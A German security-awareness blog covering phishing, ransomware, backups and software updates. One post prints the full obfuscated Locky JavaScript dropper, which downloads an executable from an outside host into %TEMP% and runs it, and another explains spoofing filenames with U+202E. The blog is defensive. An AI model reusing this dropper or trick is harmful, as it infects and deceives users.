Ich staune regelmäßig darüber, das offensichtlich sehr viele Menschen glauben, Internetseiten seien automatisch authentisch, nur weil die Inhalte von einer Bank stammen oder weil die Verbindungen verschlüsselt sind.sven222-mechanic-pirate

Das ist nun mal nicht so, die Inhalte werden von einem Computerprogramm, dem Browser, angezeigt. Und was der Browser anzeigt, kann auch einfach manipuliert werden. Ist der Browser einmal „gehackt“, ist nichts darin mehr sicher.

Ich zeige das mal an einem kleinen Beispiel, löse damit ein „Problem“, das mich schon länger ärgert und demonstriere damit, was ich meine.

Unser Rechenzentrum kriegt es seit Jahren nicht hin, geschlechtsneutrale Bezeichnungen in den (Online-)Formularen und im Internet zu verwenden. Nun, dem kann einfach abgeholfen werden.

Ich möchte z.B. im Postkorb nicht mehr „Absender“ stehen haben, weil mir durchaus auch Kolleginnen Nachrichten zusenden.

Ich besorge mir ein geeignetes Plugin für den Browser Firefox: FoxReplace und installiere es.

addon_page

Die Bedienung ist kinderleicht, ich trage die URL ein, also die Adresse unseres Onlinebankings und erstelle eine Tabelle der zu ersetzenden Wörter.

fox_replace

Theoretisch könnte ich nicht nur die Textausgabe verändern, sondern sogar die Eingabe. Also z.B. aus  10,00 Euro 1000,00 Euro machen.

Voila, nach einem Neustart der Seite ist aus männlichen „Absender“ das gewünschte „AbsenderIn“ geworden. Ich könnte natürlich auch „Absender /-in“ wählen, das wäre mir zu lästig oder „gesendet von“.

Natürlich lässt sich damit viel Schabernack treiben, aber ich denke, das Fazit des alten Credos ist klar geworden:

Trau, schau, wem!

Also: Prüfe, wem du glauben kannst! Der Browser gehört nicht dazu – im Zweifelsfall, bevor ein Vertrag eingegangen wird, bevor Geld überwiesen wird oder Kreditkartendaten geprüft werden, muss man 100%ig sichergehen, dass die Informationsbasis wirklich stimmt. Nur weil es im Web steht, ist es nicht automatisch wahr.

Konkret zum Onlinebanking:
Wenn der Browser zum einem Test auffordert: Das stammt nicht von der Bank! Diese Aufforderung stammt mit Sicherheit von einer Betrugssoftware! So eine kann monatelang im Hintergrund auf dem Rechner inaktiv schlummer, bevor sie aktiv wird. Es gibt viele Programme, die auch der aktuellste Virenscanner nicht entdeckt!

Ergänzung 18.10.2016: Skype-Erweiterung ändert Inhalte und stört Funktionen im Onlinebanking.

 

Eine der Hauptverbreitungswege für Schadsoftware ist die E-Mail.Piraten-Flagge

Beinahe täglich erhalte ich Aufforderungen auf meiner privaten Mailadresse, dringend irgendetwas online zu prüfen, irgendwo eine Sicherheitseinstellung zu ändern, Kreditkarten- und Kontosperren zu verhindern oder Onlinebankingzugänge zu verifizieren. Selbst daran, mit den eigenen Daten konfrontiert und persönlich angesprochen zu werden, habe ich mich inzwischen einigermaßen gewöhnt. Unlängst habe ich sogar eine Bewerbung mit Lebenslauf in einem Virenverseuchten Wordformat erhalten.

Dass in einigen Mails in den Anhängen Trojanische Pferde mit gefährlichen Inhalten lauern, wissen inzwischen hoffentlich alle Nutzer. Die Sicherheitsexperten warnen:

Öffnen Sie niemals Anhänge von unbekannten Absendern!

Siehe Infografik aus dem deutschen Kaspersky-Blog.

Was ich nicht verstehe: Wieso wird vor „unbekannten Absendern“ gewarnt?

Die Gefahr lauert erst Recht in Mails von bekannten Menschen und Firmen! Trojaner lesen Adressdatenbanken doch seit Jahren aus und nutzen die Daten zum Verteilen. Das dürfte sich gerade bei Erpressersoftware lohnen, die ja kaum Interesse hat, sich lange zu verstecken, hier ist das primäre Hauptziel, eine möglichst hohe Infektionsquote zu erzielen.

Entsprechend meine Empfehlung:

  • Seien Sie grundsätzlich misstrauisch bei Anhängen und Links in unangekündigten E-Mails, auch bei bekannten Absendern.
  • Prüfen Sie diese vor dem Öffnen akribisch.
  • Nehmen Sie ggf. Rücksprache mit den Absendern.
  • Lassen Sie Spaßmails erstmal liegen und „heranreifen“. Derlei Unwichtiges können Sie auch noch in drei Wochen lesen, wenn Ihr Virenscanner die Gefahren gelernt hat.
  • Speichern Sie Anhänge ab und prüfen Sie diese mit einem Online-Virenscanner
  • ausführbare Dateien nicht starten
  • wenn Textverarbeitung, Tabellenkalkulation etc. nach Rechten fragt, sind wahrscheinlich Makros = Programme in der Datei versteckt=höchstes Risiko!

Bei einigen gezielten Angriffsformen geht es nicht mal darum, Spionagesoftware und trojanische Pferde einzuschleusen, wenn die Betrüger die nötigen Informationen schon haben.

Eine Spielart ist der/die/das (?) sogenannte CEO-Fraud, eine erfolgreiche Masche der Angriffe über social engineering.

Hier einer der letzten Berichte aus einer ganzen Reihe von Warnungen und Berichten zu diesem Thema:
Kölner Stadtanzeiger

 

Piraten-FlaggeSo macht man Druck auf die Opfer. Jede Stunde länger warten und eine Datei wird vernichtet. Je länger man wartet, desto mehr Dateien müssen immer schneller dran glauben. Perfide, dass bei einem Neuboot gleich 1.000 Stück weg sein sollen. Immerhin fällt der Preis, verglichen mit dem „Ransomsoftware-Wettbewerb“ auf 0,4 BTC, das sind aktuell um die 150,00 Euro, andere sind da teurer.

Glücklicherweise gibt es anscheinend schon ein Dechiffrier-Tool, das die Dateien wieder herstellen kann. Man sollte also nicht bezahlen.

Ich bin nicht sicher, was wirklich passiert – hat man aber den Rechner heruntergefahren, sollte man keinesfalls den Computer einfach über das normale System neu starten. Entweder baut man die betroffenen Datenträger oder es empfiehlt sich der Neuboot mit einem Live-Linux-System, z.B. Knoppix, um Backups zu erstellen. Dabei wird die Schadsoftware nicht aktiviert und man

Quelle und weitere Links: Golem

Am Freitag hatte der Admin frei, am Samstag war dann Samsa da?Malware-Warnsymbol_rot_gluehend

Bei den aufgedeckten Fällen mit dieser Erpressersoftware wird offensichtich  viel „per Hand“ erledigt, der Einbruch in das Netzwerk und auch die Verschlüsselung des Systems erfolgt gezielt manuell.

Bei dem Aufwand ist auch die Lösegeldforderung höher – 50 Bitcoins für die Entsperrung des gesamten Netzes entsprechen heute fast 19.000,00 Euro. Der Einzelrechner ist mit 1,5 BTC dabei. Da sind die 0,5 BTC des Locky-Trojaners ja fast ein Schnäppchen.

Billige, „für alle erschwingliche Massenware“ gegen gezielte individuelle „Kundenbetreuung“ also auch hier 😉

Da fragt man sich, ob nicht gleich noch andere Beute gemacht wird, also z.B. mit Industriespionage und/oder Sabotage. Womöglich ist einem Wettbewerber die noch nicht zum Patent angemeldete Erfindung des Konkurrenten sogar etwas mehr wert als 50 Bitcoins?

Wer sich übrigens für die Erträge der Erpresser interessiert: Die Transaktionen von Bitcoinzahlungen sind ja nachvollziehbar, auch wenn die Eigentümer der Wallets nicht bekannt sind.

http://www.heise.de/newsticker/meldung/Erpressungs-Trojaner-mit-neuer-Taktik-Erst-schauen-dann-verschluesseln-3153767.html

Digitale Erpressung ist für die Betrüger äußerst lukrativ und wir stehen vermutlich erst am Beginn einer Welle von Erpressungstrojanern, die neuesten Varianten dieser Viren sind vermutlich so gut Security-Shieldsprogrammiert, dass eine Entschlüsselung nicht mehr möglich ist. >Heise über PGP-Trojaner

Regelmäßig durchgeführte und geeignete Datensicherungsstrategien (Backups) sind absolut notwendig, wenn man wichtige Daten mit digitaler Technik verwaltet und mehr und mehr von der Technik abhängig wird.

Worst Case Szenario – was wäre wenn?

Ich halte folgendes regelmäßiges Gedankenspiel für sehr wichtig:

  • Was passiert im schlimmsten Fall mit meiner Arbeit/meinem Hobby oder meinem Betrieb/meinem Verein, wenn mir mein Arbeitssystem komplett abhanden kommt (Diebstahl, Brand im Serverraum)?
  • Kann ich sicherstellen, dass ich in der gewünschten Zeit wieder arbeitsfähig bin?
  • Was kostet mich der Aufwand?
  • Wie groß wäre der potentielle finanzielle oder zeitliche Schaden?
  • Habe ich Ausweichmöglichkeiten?
  • Könnte der Diebstahl Auswirkungen auf Zugänge haben und könnte ich diese schnell genug sperren, Passwörter ändern?
  • Hat sich nach meinem letzten Gedankenspiel wesentliches geändert, ist Hard- und Software noch zeitgemäß und kostengünstig ersetzbar?
  • Stimmen die Verträge mit meinen Dienstleistern noch und sind sie angemessen?

Gedankenspiele reichen nicht, Testen ist wichtig

Man muss regelmäßig testen, ob die Sicherungsmaßnahmen ausreichen und funktionieren, die man getroffen hat. Was nützt mir beispielsweise ein perfekt durchorganisiertes und zuverlässiges Bandsystem, wenn ich es an keinem Ersatz-Computer mehr installieren und an Laufen bringen kann. Oder wenn die alte Software auf einem aktuellen Betriebssystem nicht mehr funktioniert? Oder im Betrieb: Wenn die Leute, die sich mit der Rücksicherung einer Datenbank auskennen, bereits in Rente oder woanders beschäftig sind?


Was Sie zur Vorsorge wg. der aktuellen Bedrohungen machen sollten, können Sie hier lesen:

http://www.heise.de/newsticker/meldung/Krypto-Trojaner-Locky-Was-tun-gegen-den-Windows-Schaedling-3112408.html

http://www.heise.de/newsticker/meldung/Erpressungs-Trojaner-fernhalten-Mit-Windows-Bordmittel-Makros-in-Office-2016-global-verbieten-3149377.html

http://www.heise.de/newsticker/meldung/Erpressungs-Trojaner-Surprise-verbreitet-sich-anscheinend-ueber-TeamViewer-3148863.html

http://www.heise.de/thema/Ransomware

Über den Unsinn mit der Mail von „den unbekannten Absendern“.


Ergänzung: Es gibt ein Tool im Betastadium (aktuell nicht für den produktiven Betrieb empfohlen), das auf das typische Verhalten der Verschlüssellung reagiert und den Prozess anhält und Alarm schlägt:
http://www.heise.de/newsticker/meldung/Krypto-Trojaner-Locky-Batch-Dateien-infizieren-Windows-Tool-verspricht-Schutz-3118188.html

Das Tool ist nur ein Hilfsmittel und kein Ersatz für eine regelmäßige Datensicherung.

Update (04.07.2016):
Heise: Gratis Tools entschlüsseln diverse Erpressungs-Trojaner

Die mir zugeschickte vermeintliche Rechnung oder das Fax enthält einen Anhang, der mit knapp über 700 Bytes (!)  einfach zu klein für ein PDF ist.

Was ist da los? Kein Virenscanner erkennt die zip Datei und den Javascript-Inhalt als Container einer Virendatei? Keiner von 54 Scannern auf Virustotal schlägt Alarm? Mein Kollege spekulierte gar nicht so abwegig: Das ist bestimmt der Bundestrojaner, der kommt „von oben“ und wird halt nicht erkannt.

Der Anhang enthält eine Javascript-Datei, die offeniichtlich  eine mit Unicode-verschleierte Webseite nachladen will. Sehr perfide, sehr geschickt.

Glaubt man den aktuellen Zahlen, werden pro Stunde 5000 Rechner in Deutschland vom enthaltenen Locky-Virus infiziert. Die Ransomware verschlüsselt die erreichbaren Dateien und man erhält  nur durch Zahlung eines Lösegeldes wieder die Ursprungsdateien zurück.

Siehe auch:
http://www.golem.de/news/ransomware-locky-kommt-jetzt-auch-ueber-javascript-1602-119331.html
Erpressungstrojaner Tesla (intern vrkennung.de)

Bildschirmfoto_2016-02-24_21-07-26

 

Die Verschleierung ist kein neues Thema:
http://www.heise.de/security/meldung/Rueckwaerts-wird-ein-Virus-draus-1242127.html

Code des Anhangs ( Javascript Datei hier als einfacher Text dargestellt und deshalb harmlos):

var fawqAx= this[‚\u0041c\u0074i\u0076\u0065XO\u0062je\u0063t‘];
var laMhHYOhH = new fawqAx(‚\u0057S\u0063r\u0069\u0070\u0074\u002E\u0053\u0068e\u006C\u006C‘);
var uDsEft = laMhHYOhH[‚\u0045x\u0070\u0061\u006E\u0064Envir\u006Fn\u006De\u006E\u0074S\u0074\u0072in\u0067s‘](‚\u0025TE\u004DP\u0025‘) + ‚\u002F\u0068\u0055O\u0048Mma\u0069n.\u0065x\u0065‘;
var nheEANo = new fawqAx(‚\u004D\u0053XM\u004C\u0032.X\u004D\u004C\u0048TT\u0050‘);
nheEANo[‚\u006Fn\u0072\u0065\u0061\u0064y\u0073\u0074\u0061\u0074ec\u0068\u0061\u006E\u0067e‘] = function() {
if (nheEANo[‚\u0072\u0065a\u0064\u0079\u0073t\u0061\u0074\u0065‘] === 4) {
var RxgIdfvB = new fawqAx(‚\u0041\u0044\u004F\u0044\u0042.S\u0074\u0072\u0065\u0061\u006D‘);
RxgIdfvB[‚op\u0065\u006E‘]();
RxgIdfvB[‚\u0074\u0079pe‘] = 1;
RxgIdfvB[‚\u0077ri\u0074\u0065‘](nheEANo[‚\u0052es\u0070\u006F\u006E\u0073e\u0042\u006F\u0064\u0079‘]);
RxgIdfvB[‚\u0070os\u0069\u0074\u0069\u006F\u006E‘] = 0;
RxgIdfvB[‚\u0073av\u0065\u0054o\u0046\u0069le‘](uDsEft, 2);
RxgIdfvB[‚\u0063lo\u0073\u0065‘]();
};
};
try {
var    HYOAzVaz = ‚R\u0075n‘;
nheEANo[‚\u006F\u0070en‘](‚GE\u0054‘ , ‚h\u0074\u0074p://\u0068t\u0074\u0070\u003A\u002F\u002F\u0066i\u0072\u0073t\u0063o\u0070\u0079\u006Dall\u002E\u0063\u006F\u006D/\u0073\u0079\u0073t\u0065m\u002F\u006Co\u0067\u0073\u002F\u0038\u0037h7\u00354‘, false);
nheEANo[‚\u0073e\u006Ed‘]();
laMhHYOhH [HYOAzVaz](uDsEft, 1, false);
} catch (ajg9ggxFs) {};

Der Rechts-nach-Links Trick

Den kannte ich auch noch nicht: Mit einer einfachen Zeichenfolge kann der Dateiname eines Mailanhangs sehr einfach verschleiert werden. Mit Hilfe des Unicode-Zeichens U+202E ändert sich die Schreibrichtung von Wörtern im Dateinamen von rechts-nach-links. Das gilt für alle Windows-Versionen, auch für Windows 10. Bekannt ist der Missbrauch durch Betrüger schon lange, wenn man die Suchdienste bemüht.

Ein Virus heißt zum Beispiel „Ihre Rechnung“ und wird durch das Anhängen von U+202Edoc.exe. in der Dateianzeige zu „Ihre Rechnungexe.doc“, wird aber direkt wieder zu einer ausführbaren Datei!

Es gilt weiterhin: Misstrauisch bleiben – nie eine Datei mit Doppelklick öffnen – erst speichern und am besten im Kontextmenü (rechte Maustaste) die Eigenschaften der Datei prüfen und zur Sicherheit auf Virustotal.com hochladen.

FinTS/HBCI mit Signaturdatei ist sehr sicher und bequem, wenn eine ausreichend starke Verschlüsselung eingesetzt wird. Genossenschaftliche Banken verwenden nur noch RDH10 mit langen Schlüsseln. Die verwendete Verschlüsselungstechnik ist dokumentiert und veröffentlicht, es gibt auch einige open-Source Programme, die diese Technik unterstützen. Das ist nicht bei allen Banken so.

Alternativen
Die Chipkarte: Kann nicht kopiert werden und sperrt sich nach 3 maliger falscher PIN-Eingabe in Folge
PIN und TAN: Auftragskontrolle bei SmartTAN und mobileTAN und auch im Browser nutzbar

Potentielle Angreifer werden – so vermute ich –
a) entweder versuchen, die Onlinebanking-Software selbst zu unterwandern, also z.B. gefälschte Aufträge in das System hineinzubringen oder
b) in den Besitz der Signaturdatei und des dazugehörigen Passwortes zu kommen, um auf einem eigenen System zu arbeiten. Das verwendete Computersystem muss also gut abgesichert sein.
c) ein durchprobieren sämtlicher Passwörter halte ich bei guten Passwörtern für aussichtslos.

Ersteres würde sämtliche andere Verfahren im gleichen Maße treffen, weshalb dies von einigen Experten als das wahrscheinlichere angesehen wird. Mir erscheint das zweite Szenario aber als „einfacher“ zu programmieren. Zur Beruhigung: Bislang ist mir aber noch nie ein Angriff „von außen“ bekannt geworden. Betrugsversuche von Insidern sind allerdings vorgekommen.

Folgende Sicherheitsmaßnahmen sind unumgänglich:

  • die Signaturatei darf niemals in fremde Hände geraten
  • das dazugehörige Passwort darf ebenfalls niemals Dritten zugänglich werden

Viele denken bei ersterem Punkt an den USB-Stick oder an die Sicherheitsdatei und verwahren diese besonders sicher. Das ist richtig und gut so, aber womöglich zu kurz gedacht, die Sicherheitsdatei könnte ja auch unbemerkt kopiert werden. Auch der zweite Teil der Sicherheit, nämlich das zur Datei gehörige Passwort, muss vertraulich bleiben.

Die Gefahr: Passwörter könnten von sogenannten Keyloggern direkt bei der Tastatureingabe ausgelesen werden.

Lesen Sie hier weiter, was im Fall der Fälle zu tun ist


Das Betriebssystem Windows aktuell zu halten, ist nicht schwer. Das macht Windows in der Standard-Einstellung – meist – problemlos allein. Es ist aber sehr schwer, das „Ökosystem Windows“ mit allen anderen Programmen insgesamt auf einem aktuellen und damit sicheren Stand zu halten.

Viele Hersteller vernachlässigen die Pflege alter Programmversionen und so schlummert meist die eine oder andere Programmleiche auf der Festplatte und viele enthaltene Sicherheitslücken sind tickende Zeitbomben.

Die gefährlichsten Sicherheitslücken lauern in Programmen, die direkt oder indirekt mit dem Internet verbunden sind, ich meine damit z.B. Erweiterungen und Plugins für Browser, Mail und Office, Video- und Bildprogramme. Virenscanner können nur bei Bedrohungen helfen, die bekannt und analysiert sind, besser ist in jedem Fall die Prävention. Alte Programme müssen aktualisiert werden, unbenötigte Software gehört deinstalliert und Programme die nicht mehr gepflegt werden, müssen ausgetauscht werden.

Einen schnellen Überblick über die Situation verschaffen Tools, die Tausende von Programmen und ihre Versionsstände in den Datenbanken haben. Sie warnen vor veralteter Software und Treibern und bieten direkte Links zur Aktualisierung oder können sogar per Klick die passenden Updates liefern. Kennen sie Programme nicht, erfährt man auch das. Ein weiterer Vorteil: Die Tools übersehen wenig und man kann mal wieder aufräumen. Das schafft Luft und pflegt den Computer.

Wichtig
Achtung: Vertrauen gehört zum Einsatz dieser Tools dazu. Die Kombination der installierten Programme machen jeden Computer wie eine DNA-Sequenz leicht identifizierbar, der Rechner ist eindeutig erkennbar.

Ich stelle hier nur ein Programm selbst vor, das ich schon länger kenne und von dem ich bisher nichts schlechtes gehört habe. Ich selbst habe es bei einigen Freunden problemlos im Einsatz, siehe unten.

Secunia Personal Software Inspector (kurz Secunia PSI)

Das Smartphone Gegenstück  PSI for Android habe ich noch nicht selbst getestet, werde dies aber noch nachholen und separat darüber schreiben.

Diese Programme sind kostenlos. Sie informiert neben dem oben genannten auch zusätzlich über die (be-)erkannte Sicherheitslücken.

Secunia hat seinen Sitz in Kopenhagen, unterliegt also dem europäischen Recht, ein großer Vorteil, wie ich finde. Das Geschäftsmodell dürfte auf die Verwertung der gewonnenen Informationen liegen. Andere Programme aus dem gleichen Haus sind kostenpflichtig. Zu den Referenz-Kunden der Firma zählen u.a. die CoBa und die Deutsche Bundesbank, aber auch Siemens.

Ich verweise nun auf eine ältere Blog-Seite von Netzwelt.de, in dem auch Alternativen aufgezeigt werden (wie SUMo, etc.). So kann sich jeder einen eigenen Überblick verschaffen: www.netzwelt.de


 

Meine eigenen Erfahrungen mit Secunia PSI

Ich habe das Programm bei einigen Freunden installiert, die (noch) Windows nutzen. Die Erfahrung war dabei insgesamt sehr positiv, der Betrieb an sich ist problemlos und die Zusammenhänge sind einfach zu erklären. Seit dem Einsatz habe ich tatsächlich wesentlich weniger Rückfrage wg. infizierter Rechner, das mag aber auch damit zusammen hängen, dass bei kritischen oder auch bei fehlenden Updates die Aufmerksamkeit höher geworden ist. Ich selbst übersehe weniger und mein Überblick über die Softwaresitutation ist umfassender. Ein negativer Aspekt ist eine Steigerung der Verunsicherung, so dass schon mal schneller das Telefon klingelt. Das ist mir aber persönlich wesentlich lieber, als eine aufwändige Virenentseuchung oder Neuinstallation. Meine Erfahrung ist natürlich alles andere als repräsentativ.

Haben Sie eigene Erfahrungen mit Tools wie Secunia PSI? Schreiben Sie bitte einen Kommentar!